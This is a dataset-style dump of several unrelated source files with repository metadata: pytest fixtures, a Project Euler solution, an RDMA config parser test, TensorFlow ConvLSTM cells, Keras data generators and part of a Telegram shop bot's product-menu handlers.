|
Sean-McVeigh/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from tests.fixtures.multipolygon import geojson
from tests.fixtures.multipolygon import geointerface
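# pytest discovers fixtures imported into conftest.py, so tests in this
# directory can request them by name (illustrative, assumed fixture shape):
#
#   def test_multipolygon_type(geojson):
#       assert geojson["type"] == "MultiPolygon"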
| 24.666667
| 52
| 0.77027
| 19
| 148
| 6
| 0.736842
| 0.157895
| 0.298246
| 0.508772
| 0.614035
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007576
| 0.108108
| 148
| 5
| 53
| 29.6
| 0.856061
| 0.283784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
435143ab937d678d8cbc1c808b098ee0b4bb63c8
| 1,287
|
py
|
Python
|
python/p8.py
|
tonyfg/project_euler
|
3a9e6352a98faaa506056b42160c91bffe93838c
|
[
"WTFPL"
] | null | null | null |
python/p8.py
|
tonyfg/project_euler
|
3a9e6352a98faaa506056b42160c91bffe93838c
|
[
"WTFPL"
] | null | null | null |
python/p8.py
|
tonyfg/project_euler
|
3a9e6352a98faaa506056b42160c91bffe93838c
|
[
"WTFPL"
] | null | null | null |
#Q: Find the greatest product of five consecutive digits in the 1000-digit number.
#A: 40824
bignum = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
arr = [bignum[i:i+5] for i in range(len(bignum)-4)]
max_product = 0
for i in arr:
    tmp = int(i[0])*int(i[1])*int(i[2])*int(i[3])*int(i[4])
    if tmp > max_product:
        max_product = tmp
print(max_product)
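# Equivalent one-liner (illustrative; math.prod requires Python 3.8+):
#
#   from math import prod
#   print(max(prod(map(int, bignum[i:i+5])) for i in range(len(bignum) - 4)))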
| 107.25
| 1,011
| 0.912976
| 59
| 1,287
| 19.915254
| 0.559322
| 0.017021
| 0.010213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.829527
| 0.047397
| 1,287
| 11
| 1,012
| 117
| 0.128874
| 0.069153
| 0
| 0
| 0
| 0
| 0.83612
| 0.83612
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.125
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4375cd79a75387dea0092bc7cec499c1277fb1c8
| 2,487
|
py
|
Python
|
insights/parsers/tests/test_rdma_config.py
|
lhuett/insights-core
|
1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8
|
[
"Apache-2.0"
] | 121
|
2017-05-30T20:23:25.000Z
|
2022-03-23T12:52:15.000Z
|
insights/parsers/tests/test_rdma_config.py
|
lhuett/insights-core
|
1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8
|
[
"Apache-2.0"
] | 1,977
|
2017-05-26T14:36:03.000Z
|
2022-03-31T10:38:53.000Z
|
insights/parsers/tests/test_rdma_config.py
|
lhuett/insights-core
|
1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8
|
[
"Apache-2.0"
] | 244
|
2017-05-30T20:22:57.000Z
|
2022-03-26T10:09:39.000Z
|
import doctest
import pytest
from insights.tests import context_wrap
from insights.parsers import rdma_config as scc, SkipException
RDMA_CONFIG = """
# Load IPoIB
IPOIB_LOAD=yes
# Load SRP (SCSI Remote Protocol initiator support) module
SRP_LOAD=yes
# Load SRPT (SCSI Remote Protocol target support) module
SRPT_LOAD=yes
# Load iSER (iSCSI over RDMA initiator support) module
ISER_LOAD=yes
# Load iSERT (iSCSI over RDMA target support) module
ISERT_LOAD=yes
# Load RDS (Reliable Datagram Service) network protocol
RDS_LOAD=no
# Load NFSoRDMA client transport module
XPRTRDMA_LOAD=yes
# Load NFSoRDMA server transport module
SVCRDMA_LOAD=no
# Load Tech Preview device driver modules
TECH_PREVIEW_LOAD=no
# Should we modify the system mtrr registers? We may need to do this if you
# get messages from the ib_ipath driver saying that it couldn't enable
# write combining for the PIO buffs on the card.
#
# Note: recent kernels should do this for us, but in case they don't, we'll
# leave this option
FIXUP_MTRR_REGS=no
"""
RDMA_CONFIG_INPUT_EMPTY = """
# Load IPoIB
#IPOIB_LOAD=yes
# Load SRP (SCSI Remote Protocol initiator support) module
#SRP_LOAD=yes
# Load SRPT (SCSI Remote Protocol target support) module
#SRPT_LOAD=yes
# Load iSER (iSCSI over RDMA initiator support) module
#ISER_LOAD=yes
# Load iSERT (iSCSI over RDMA target support) module
#ISERT_LOAD=yes
# Load RDS (Reliable Datagram Service) network protocol
#RDS_LOAD=no
# Load NFSoRDMA client transport module
#XPRTRDMA_LOAD=yes
# Load NFSoRDMA server transport module
#SVCRDMA_LOAD=no
# Load Tech Preview device driver modules
#TECH_PREVIEW_LOAD=no
# Should we modify the system mtrr registers? We may need to do this if you
# get messages from the ib_ipath driver saying that it couldn't enable
# write combining for the PIO buffs on the card.
#
# Note: recent kernels should do this for us, but in case they don't, we'll
# leave this option
#FIXUP_MTRR_REGS=no
"""
def test_rdma_config():
rdma_config = scc.RdmaConfig(context_wrap(RDMA_CONFIG))
assert rdma_config["IPOIB_LOAD"] == 'yes'
assert rdma_config["SRP_LOAD"] == 'yes'
assert rdma_config["SVCRDMA_LOAD"] == 'no'
def test_rdma_config_empty():
with pytest.raises(SkipException):
scc.RdmaConfig(context_wrap(RDMA_CONFIG_INPUT_EMPTY))
def test_rdma_config_doc():
env = {
'rdma_conf': scc.RdmaConfig(context_wrap(RDMA_CONFIG)),
}
failed, total = doctest.testmod(scc, globs=env)
assert failed == 0
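# To run just this module (assuming a standard insights-core checkout with
# pytest installed):
#
#   pytest insights/parsers/tests/test_rdma_config.py -v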
| 30.703704
| 76
| 0.765179
| 386
| 2,487
| 4.784974
| 0.279793
| 0.053059
| 0.071467
| 0.027612
| 0.831619
| 0.787223
| 0.731998
| 0.731998
| 0.731998
| 0.731998
| 0
| 0.00048
| 0.161641
| 2,487
| 80
| 77
| 31.0875
| 0.885372
| 0
| 0
| 0.416667
| 0
| 0.027778
| 0.720949
| 0.008444
| 0
| 0
| 0
| 0
| 0.055556
| 1
| 0.041667
| false
| 0
| 0.055556
| 0
| 0.097222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43bd1364d04de3159331f518c26d241b37fc740f
| 13,894
|
py
|
Python
|
mvsnet/lstm.py
|
haibao637/D2HC-RMVSNet
|
cbed5809c5ee8a6cdb8d63fac825276e67c40349
|
[
"MIT"
] | 9
|
2020-08-25T01:46:02.000Z
|
2020-12-03T15:06:49.000Z
|
mvsnet/lstm.py
|
haibao637/D2HC-RMVSNet
|
cbed5809c5ee8a6cdb8d63fac825276e67c40349
|
[
"MIT"
] | null | null | null |
mvsnet/lstm.py
|
haibao637/D2HC-RMVSNet
|
cbed5809c5ee8a6cdb8d63fac825276e67c40349
|
[
"MIT"
] | 1
|
2021-02-01T06:09:46.000Z
|
2021-02-01T06:09:46.000Z
|
"""Module for constructing RNN Cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
from tensorflow.contrib.compiler import jit
from tensorflow.contrib.layers.python.layers import layers
from tensorflow.contrib.rnn.python.ops import core_rnn_cell
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import op_def_registry
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras import activations
from tensorflow.python.keras import initializers
from tensorflow.python.keras.engine import input_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_impl # pylint: disable=unused-import
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import partitioned_variables # pylint: disable=unused-import
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest
import tensorflow as tf
class ConvLSTMCell(rnn_cell_impl.RNNCell):
"""Convolutional LSTM recurrent network cell.
https://arxiv.org/pdf/1506.04214v1.pdf
"""
def __init__(self,
conv_ndims,
input_shape,
output_channels,
kernel_shape,
dilation=1,
use_bias=True,
skip_connection=False,
forget_bias=1.0,
initializers=None,
name="conv_lstm_cell"):
"""Construct ConvLSTMCell.
Args:
conv_ndims: Convolution dimensionality (1, 2 or 3).
input_shape: Shape of the input as int tuple, excluding the batch size.
output_channels: int, number of output channels of the conv LSTM.
kernel_shape: Shape of kernel as an int tuple (of size 1, 2 or 3).
dilation: Dilation rate of the convolution. Default: 1.
use_bias: (bool) Use bias in convolutions.
skip_connection: If set to `True`, concatenate the input to the
output of the conv LSTM. Default: `False`.
forget_bias: Forget bias.
initializers: Unused.
name: Name of the module.
Raises:
ValueError: If `skip_connection` is `True` and stride is different from 1
or if `input_shape` is incompatible with `conv_ndims`.
"""
super(ConvLSTMCell, self).__init__(name=name)
if conv_ndims != len(input_shape) - 1:
raise ValueError("Invalid input_shape {} for conv_ndims={}.".format(
input_shape, conv_ndims))
self._dilation = dilation
self._conv_ndims = conv_ndims
self._input_shape = input_shape
self._output_channels = output_channels
self._kernel_shape = list(kernel_shape)
self._use_bias = use_bias
self._forget_bias = forget_bias
self._skip_connection = skip_connection
self._total_output_channels = output_channels
if self._skip_connection:
self._total_output_channels += self._input_shape[-1]
state_size = tensor_shape.TensorShape(
self._input_shape[:-1] + [self._output_channels])
self._state_size = rnn_cell_impl.LSTMStateTuple(state_size, state_size)
self._output_size = tensor_shape.TensorShape(
self._input_shape[:-1] + [self._total_output_channels])
@property
def output_size(self):
return self._output_size
@property
def state_size(self):
return self._state_size
def call(self, inputs, state,scope=None):
cell, hidden = state
# with vs.variable_scope(scope, reuse=tf.AUTO_REUSE):
new_hidden = _conv([inputs, hidden], self._kernel_shape,
                   4 * self._output_channels, self._use_bias,
                   dilations=self._dilation, name="kernel")
gates = array_ops.split(
value=new_hidden, num_or_size_splits=4, axis=self._conv_ndims + 1)
input_gate, new_input, forget_gate, output_gate = gates
new_cell = math_ops.sigmoid(forget_gate + self._forget_bias) * cell
new_cell += math_ops.sigmoid(input_gate) * math_ops.tanh(new_input)
output = math_ops.tanh(new_cell) * math_ops.sigmoid(output_gate)
if self._skip_connection:
output = array_ops.concat([output, inputs], axis=-1)
new_state = rnn_cell_impl.LSTMStateTuple(new_cell, output)
return output, new_state
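# Usage sketch (illustrative, TF1-style; shapes are example assumptions, not
# requirements of this module):
#
#   cell = ConvLSTMCell(conv_ndims=2, input_shape=[32, 32, 3],
#                       output_channels=8, kernel_shape=[3, 3])
#   seq = tf.placeholder(tf.float32, [None, 10, 32, 32, 3])
#   outputs, state = tf.nn.dynamic_rnn(cell, seq, dtype=tf.float32)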
def _conv(args, filter_size, num_features, bias, bias_start=0.0,dilations=1,name="kernel"):
"""Convolution.
Args:
args: a Tensor or a list of Tensors of dimension 3D, 4D or 5D,
batch x n, Tensors.
filter_size: int tuple of filter shape (of size 1, 2 or 3).
num_features: int, number of features.
bias: Whether to use biases in the convolution layer.
bias_start: starting value to initialize the bias; 0 by default.
Returns:
A 3D, 4D, or 5D Tensor with shape [batch ... num_features]
Raises:
ValueError: if some of the arguments has unspecified or wrong shape.
"""
# Calculate the total size of arguments on dimension 1.
total_arg_size_depth = 0
shapes = [a.get_shape().as_list() for a in args]
shape_length = len(shapes[0])
for shape in shapes:
if len(shape) not in [3, 4, 5]:
raise ValueError("Conv Linear expects 3D, 4D "
"or 5D arguments: %s" % str(shapes))
if len(shape) != len(shapes[0]):
raise ValueError("Conv Linear expects all args "
"to be of same Dimension: %s" % str(shapes))
else:
total_arg_size_depth += shape[-1]
dtype = [a.dtype for a in args][0]
# determine correct conv operation
if shape_length == 3:
conv_op = nn_ops.conv1d
strides = 1
elif shape_length == 4:
conv_op = nn_ops.conv2d
strides = shape_length * [1]
elif shape_length == 5:
conv_op = nn_ops.conv3d
strides = shape_length * [1]
# Now the computation.
kernel = vs.get_variable(
name, filter_size + [total_arg_size_depth, num_features], dtype=dtype)
if len(args) == 1:
    res = conv_op(args[0], kernel, strides, dilations=dilations, padding="SAME")
else:
res = conv_op(
array_ops.concat(axis=shape_length - 1, values=args),
kernel,
strides,
dilations=dilations,
padding="SAME")
if not bias:
return res
bias_term = vs.get_variable(
"biases", [num_features],
dtype=dtype,
initializer=init_ops.constant_initializer(bias_start, dtype=dtype))
return res + bias_term
def _deconv(args, filter_size, num_features, bias, bias_start=0.0, dilations=1, name="kernel"):
  """Transposed convolution.
  Args:
    args: a 3D, 4D or 5D Tensor, or a list of such Tensors of equal rank, to
      be concatenated along the channel axis and deconvolved.
    filter_size: int tuple of filter shape (of size 1, 2 or 3).
    num_features: int, number of output features.
    bias: Whether to use biases in the convolution layer.
    bias_start: starting value to initialize the bias; 0 by default.
    dilations: dilation rate passed to the op; 1 by default.
    name: variable name for the kernel.
  Returns:
    A 3D, 4D, or 5D Tensor with shape [batch ... num_features].
  Raises:
    ValueError: if any of the arguments has an unspecified or wrong shape.
  """
# Calculate the total size of arguments on dimension 1.
total_arg_size_depth = 0
shapes = [a.get_shape().as_list() for a in args]
shape_length = len(shapes[0])
for shape in shapes:
if len(shape) not in [3, 4, 5]:
raise ValueError("Conv Linear expects 3D, 4D "
"or 5D arguments: %s" % str(shapes))
if len(shape) != len(shapes[0]):
raise ValueError("Conv Linear expects all args "
"to be of same Dimension: %s" % str(shapes))
else:
total_arg_size_depth += shape[-1]
dtype = [a.dtype for a in args][0]
  # determine correct transposed-conv operation
  # (note: the tf.nn.conv*_transpose ops also expect an output_shape argument,
  # which this helper does not pass; callers must ensure compatible shapes)
if shape_length == 3:
conv_op = nn_ops.conv1d_transpose
strides = 1
elif shape_length == 4:
conv_op = nn_ops.conv2d_transpose
strides = shape_length * [1]
elif shape_length == 5:
conv_op = nn_ops.conv3d_transpose
strides = shape_length * [1]
# Now the computation.
kernel = vs.get_variable(
name, filter_size + [total_arg_size_depth, num_features], dtype=dtype)
if len(args) == 1:
    res = conv_op(args[0], kernel, strides, dilations=dilations, padding="SAME")
else:
res = conv_op(
array_ops.concat(axis=shape_length - 1, values=args),
kernel,
strides,
dilations=dilations,
padding="SAME")
  if not bias:
    return res
  bias_term = vs.get_variable(
      "biases", [num_features],
      dtype=dtype,
      initializer=init_ops.constant_initializer(bias_start, dtype=dtype))
  return res + bias_term
_bn = tf.layers.batch_normalization
class ConvBnLSTMCell(ConvLSTMCell):
  def __init__(self, conv_ndims, input_shape, output_channels, kernel_shape, dilation=1, use_bias=True, skip_connection=False, forget_bias=1.0, initializers=None, name='conv_lstm_cell'):
    super(ConvBnLSTMCell, self).__init__(conv_ndims, input_shape, output_channels, kernel_shape, dilation=dilation, use_bias=use_bias, skip_connection=skip_connection, forget_bias=forget_bias, initializers=initializers, name=name)
    self._conv = _conv_bn

class DeConvBnLSTMCell(ConvLSTMCell):
  def __init__(self, conv_ndims, input_shape, output_channels, kernel_shape, dilation=1, use_bias=True, skip_connection=False, forget_bias=1.0, initializers=None, name='conv_lstm_cell'):
    super(DeConvBnLSTMCell, self).__init__(conv_ndims, input_shape, output_channels, kernel_shape, dilation=dilation, use_bias=use_bias, skip_connection=skip_connection, forget_bias=forget_bias, initializers=initializers, name=name)
    self._conv = _deconv_bn
def _deconv_bn(args, filter_size, num_features, bias, bias_start=0.0, dilations=1, relu=False, name="kernel"):
  res = _deconv(args, filter_size, num_features, bias, bias_start=bias_start, dilations=dilations, name=name)
  res = _bn(res, training=True, reuse=tf.AUTO_REUSE, name=name + "_bn")
  if relu:
    res = tf.nn.relu(res)
  return res
def _conv_bn(args, filter_size, num_features, bias, bias_start=0.0, dilations=1, relu=False, name="kernel"):
  res = _conv(args, filter_size, num_features, bias, bias_start=bias_start, dilations=dilations, name=name)
  res = _bn(res, training=True, reuse=tf.AUTO_REUSE, name=name + "_bn")
  if relu:
    res = tf.nn.relu(res)
  return res
class ConvsLSTMCell(rnn_cell_impl.RNNCell):
"""Convolutional LSTM recurrent network cell.
https://arxiv.org/pdf/1506.04214v1.pdf
"""
def __init__(self,
conv_ndims,
input_shape,
output_channels,
kernel_shape,
dilation=1,
use_bias=True,
skip_connection=False,
forget_bias=1.0,
initializers=None,
name="conv_lstm_cell"):
"""Construct ConvLSTMCell.
Args:
conv_ndims: Convolution dimensionality (1, 2 or 3).
input_shape: Shape of the input as int tuple, excluding the batch size.
output_channels: int, number of output channels of the conv LSTM.
      kernel_shape: Shape of kernel as an int tuple (of size 1, 2 or 3).
      dilation: Dilation rate for the convolutions. Default: 1.
      use_bias: (bool) Use bias in convolutions.
skip_connection: If set to `True`, concatenate the input to the
output of the conv LSTM. Default: `False`.
forget_bias: Forget bias.
initializers: Unused.
name: Name of the module.
Raises:
ValueError: If `skip_connection` is `True` and stride is different from 1
or if `input_shape` is incompatible with `conv_ndims`.
"""
super(ConvsLSTMCell, self).__init__(name=name)
if conv_ndims != len(input_shape) - 1:
raise ValueError("Invalid input_shape {} for conv_ndims={}.".format(
input_shape, conv_ndims))
    self._dilation = dilation
self._conv_ndims = conv_ndims
self._input_shape = input_shape
self._output_channels = output_channels
self._kernel_shape = list(kernel_shape)
self._use_bias = use_bias
self._forget_bias = forget_bias
self._skip_connection = skip_connection
self._total_output_channels = output_channels
if self._skip_connection:
self._total_output_channels += self._input_shape[-1]
state_size = tensor_shape.TensorShape(
self._input_shape[:-1] + [self._output_channels])
self._state_size = rnn_cell_impl.LSTMStateTuple(state_size, state_size)
self._output_size = tensor_shape.TensorShape(
self._input_shape[:-1] + [self._total_output_channels])
@property
def output_size(self):
return self._output_size
@property
def state_size(self):
return self._state_size
  def call(self, inputs, state, scope=None):
    cell, hidden = state
    # with vs.variable_scope(scope, reuse=tf.AUTO_REUSE):
    new_hidden = _conv_bn([inputs, hidden], self._kernel_shape,
                          1 * self._output_channels, False,
                          dilations=self._dilation, relu=True, name="kernel0")
    new_hidden = _conv_bn([new_hidden], self._kernel_shape,
                          2 * self._output_channels, False,
                          dilations=self._dilation, relu=True, name="kernel1")
    new_hidden = _conv([new_hidden], self._kernel_shape,
                       4 * self._output_channels, self._use_bias,
                       dilations=self._dilation, name="kernel2")
gates = array_ops.split(
value=new_hidden, num_or_size_splits=4, axis=self._conv_ndims + 1)
input_gate, new_input, forget_gate, output_gate = gates
new_cell = math_ops.sigmoid(forget_gate + self._forget_bias) * cell
new_cell += math_ops.sigmoid(input_gate) * math_ops.tanh(new_input)
output = math_ops.tanh(new_cell) * math_ops.sigmoid(output_gate)
if self._skip_connection:
output = array_ops.concat([output, inputs], axis=-1)
new_state = rnn_cell_impl.LSTMStateTuple(new_cell, output)
return output, new_state
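
# A minimal usage sketch, assuming TF 1.x graph mode: driving ConvLSTMCell
# with tf.nn.dynamic_rnn. The sizes below (batch 4, 10 steps, 32x32 frames,
# 3 channels) are illustrative assumptions, not part of the original file.
import tensorflow as tf

frames = tf.placeholder(tf.float32, [4, 10, 32, 32, 3])  # [batch, time, H, W, C]
clstm = ConvLSTMCell(conv_ndims=2, input_shape=[32, 32, 3],
                     output_channels=16, kernel_shape=[3, 3])
outputs, final_state = tf.nn.dynamic_rnn(clstm, frames, dtype=tf.float32)
# outputs has shape [4, 10, 32, 32, 16]; final_state is an LSTMStateTuple of
# the cell and hidden feature maps.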

# === chicken_dinner/pubgapi/__init__.py | az7139/chicken-dinner | MIT ===
from chicken_dinner.pubgapi.core import PUBGCore
from chicken_dinner.pubgapi.pubg import PUBG
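
# A short usage sketch, assuming the chicken-dinner package's documented
# interface; the API key and shard below are placeholders.
pubg = PUBG("your-api-key", shard="steam")
samples = pubg.samples()  # recent sample matches for the shard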

# === Learn/archived/classes.py | ApocalyVec/mGesf | MIT ===
import os
import numpy as np
import keras
class indexPenDataGen(keras.utils.Sequence):
'Generates data for Keras'
def __init__(self, list_IDs, labels, batch_size=8, dim=(100, 1, 25, 25, 25),
n_classes=5, shuffle=True):
'Initialization'
self.dim = dim
self.batch_size = batch_size
self.labels = labels
self.list_IDs = list_IDs
self.n_classes = n_classes
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(len(self.list_IDs) / self.batch_size))
def __getitem__(self, index):
'Generate one batch of data'
# Generate indexes of the batch
indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]
# Find list of IDs
list_IDs_temp = [self.list_IDs[k] for k in indexes]
# Generate data
X, y = self.__data_generation(list_IDs_temp)
return X, y
def on_epoch_end(self):
'Updates indexes after each epoch'
self.indexes = np.arange(len(self.list_IDs))
        if self.shuffle:
np.random.shuffle(self.indexes)
def __data_generation(self, list_IDs_temp):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
X = np.empty((self.batch_size, *self.dim))
        y = np.empty(self.batch_size, dtype=int)
# Generate data
for i, ID in enumerate(list_IDs_temp):
# Store sample
X[i,] = np.load('D:/indexPen/dataset/' + ID + '.npy')
# Store class
y[i] = self.labels[ID]
y = keras.utils.to_categorical(y, num_classes=self.n_classes)
return X, y
class thumouseDataGen(keras.utils.Sequence):
'Generates data for Keras'
def __init__(self, list_IDs, labels, batch_size=10, dim=(10, 1, 25, 25, 25), shuffle=True, dataset_path='D:/thumouse/dataset'):
'Initialization'
self.dim = dim
self.batch_size = batch_size
self.labels = labels
self.list_IDs = list_IDs
self.shuffle = shuffle
        self.dataset_path = dataset_path
        self.on_epoch_end()
def __len__(self):
'Denotes the number of batches per epoch'
return int(np.floor(len(self.list_IDs) / self.batch_size))
def __getitem__(self, index):
'Generate one batch of data'
# Generate indexes of the batch
indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]
# Find list of IDs
list_IDs_temp = [self.list_IDs[k] for k in indexes]
# Generate data
X, y = self.__data_generation(list_IDs_temp)
return X, y
def on_epoch_end(self):
'Updates indexes after each epoch'
self.indexes = np.arange(len(self.list_IDs))
        if self.shuffle:
np.random.shuffle(self.indexes)
def __data_generation(self, list_IDs_temp):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
X = np.empty((self.batch_size, *self.dim))
y = np.zeros((self.batch_size, 2))
# Generate data
for i, ID in enumerate(list_IDs_temp):
# Store sample
X[i,] = np.load(os.path.join(self.dataset_path, ID + '.npy'))
# Store class
y[i] = self.labels[ID]
return X, y
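
# A hedged usage sketch: feeding indexPenDataGen to a Keras model. The
# partition and labels dicts and the `model` variable are illustrative
# placeholders, not defined in this file.
partition = {"train": ["id-1", "id-2"], "validation": ["id-3"]}
labels = {"id-1": 0, "id-2": 3, "id-3": 1}

train_gen = indexPenDataGen(partition["train"], labels, batch_size=8)
val_gen = indexPenDataGen(partition["validation"], labels, batch_size=8)

# model.fit_generator(generator=train_gen, validation_data=val_gen,
#                     use_multiprocessing=True, workers=4)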

# === handlers/users/product_menu_handler.py | Asadbek07/e-commerce-bot | Unlicense/MIT ===
from aiogram import types
from aiogram.dispatcher.filters.builtin import CommandHelp, CommandStart
from database.database import session, Customer, Product, Organization, savat
from loader import dp
from aiogram.types import ReplyKeyboardMarkup, KeyboardButton, ReplyKeyboardRemove
from aiogram.dispatcher.filters import Text, Regexp
from keyboards.default import amount_menu_uz, amount_menu_eng, products_menu_uz, products_menu_eng, menu_product_types_uz, menu_product_types_eng
from states.Customer_state import Customer_Form
from aiogram.dispatcher import FSMContext
@dp.message_handler(lambda message: message.text in [p.title for p in session.query(Product).all()], state=Customer_Form.product)
async def product_chosen_handler(message: types.Message, state: FSMContext):
user_id = message.from_user.id
customer = session.query(Customer).filter(Customer.customer_id == user_id).first()
language = customer.language
lang = "uz" if language == "🇺🇿O'zbekcha" else "eng"
keyboard = amount_menu_uz if lang == "uz" else amount_menu_eng
    # Note: the "eng" branch holds Russian strings; the bot's two languages
    # are Uzbek and Russian.
    text = {
"uz" : {
"text" : "Miqdorini tanlang yoki kiriting",
"price" : "Narx : ",
},
"eng" : {
"text" : "Выберите или введите количество" ,
"price" : "Цена : "
}
}
postfix = {
"uz" : "so'm",
"eng" : "UZS"
}
title = message.text
await state.update_data({
"product" : title,
})
product = session.query(Product).filter(Product.title == title).first()
await Customer_Form.next()
price = int(product.price)
price = f"{price:,}".replace(',', ' ')
print(price)
caption = product.description
caption += f"\n{text[lang]['price']} {price} {postfix[lang]} "
await message.answer_photo(product.photo_id, caption=caption)
await message.answer(text[lang]["text"], reply_markup=keyboard)
@dp.message_handler(Text(equals="📥Savat"), state=Customer_Form.product)
async def order_uz(message: types.Message, state: FSMContext):
customer = session.query(Customer).filter(Customer.customer_id == message.from_user.id).first()
products = customer.products
if len(products) > 0:
titles = [p.title for p in products]
print(titles)
btn_text = ["⬅️Ortga", "🔄Tozalash"]
keyboard = ReplyKeyboardMarkup( row_width=1, resize_keyboard=True)
keyboard.add(*(KeyboardButton(text=f"❌ {p.title}") for p in products))
keyboard.row(*(KeyboardButton(text=f"{title}") for title in btn_text))
# keyboard.add(*(KeyboardButton(f"🚖Buyurtma berish"),))
text = "📥Savat\n\n"
i = 1
total_price = 0
records = session.query(savat, Customer).filter(Customer.customer_id==customer.customer_id, savat.c.customer_id == customer.customer_id).all()
for row in records:
product = session.query(Product).filter(Product.product_id==row.product_id).first()
text += f"<strong>{i}. {product.title}</strong>\n\n"
i +=1
total_price += int(row.amount) * int(product.price)
price = format(int(product.price),",d").replace(',', ' ')
amount_show = f"{int(row.amount) * int(product.price):,}".replace(',', ' ')
text+= f"{row.amount} x {price} = {amount_show} so'm\n\n"
total_price = f"{total_price:,}".replace(',', ' ')
text += f"<strong>Umumiy: </strong> {total_price} so'm"
await message.answer(text, reply_markup=keyboard)
await Customer_Form.savat.set()
else :
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Ortga")
products_menu_uz = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Savat"),
KeyboardButton("🚖Buyurtma berish"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_uz.add(*(KeyboardButton(title) for title in titles))
await message.answer("🗑 Sizning savatingiz bo'sh, buyrutma berish uchun mahsulot tanlang", reply_markup=products_menu_uz)
@dp.message_handler(Text(equals="📥Корзина"), state=Customer_Form.product)
async def order_eng(message: types.Message, state: FSMContext):
customer = session.query(Customer).filter(Customer.customer_id == message.from_user.id).first()
products = customer.products
if len(products) != 0:
titles = [p.title for p in products]
print(titles)
btn_text = ["⬅️Назад", "🔄Очистить"]
keyboard = ReplyKeyboardMarkup( row_width=1, resize_keyboard=True)
keyboard.add(*(KeyboardButton(text=f"❌ {p.title}") for p in products))
keyboard.row(*(KeyboardButton(text=f"{title}") for title in btn_text))
# keyboard.add(*(KeyboardButton(f"🚖Place an order"),))
text = "📥Корзина\n\n"
i = 1
total_price = 0
records = session.query(savat, Customer).filter(Customer.customer_id==customer.customer_id, savat.c.customer_id == customer.customer_id).all()
for row in records:
product = session.query(Product).filter(Product.product_id==row.product_id).first()
text += f"<strong>{i}. {product.title}</strong>\n\n"
i +=1
total_price += int(row.amount) * int(product.price)
price = format(int(product.price),",d").replace(',', ' ')
amount_show = f"{int(row.amount) * int(product.price):,}".replace(',', ' ')
text+= f"{row.amount} x {price} = {amount_show} UZS\n\n"
total_price = f"{total_price:,}".replace(',', ' ')
text += f"<strong>Общий: </strong> {total_price} UZS"
await message.answer(text, reply_markup=keyboard)
await Customer_Form.savat.set()
else :
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Назад")
products_menu_eng = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Корзина"),
KeyboardButton("🚖Оформить заказ"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_eng.add(*(KeyboardButton(title) for title in titles))
await message.answer("🗑 Ваша корзина пуста, чтобы сделать заказ выберите продукты", reply_markup=products_menu_eng)
@dp.message_handler(Text(equals="⬅️Назад"), state=Customer_Form.product)
async def ortga_main_menu_ru(message: types.Message, state: FSMContext):
text = "😃 Привет, оформим вместе заказ?"
keyboard = menu_product_types_eng
await message.answer(text, reply_markup=keyboard)
await state.reset_state()
@dp.message_handler(Text(equals="⬅️Ortga"), state=Customer_Form.product)
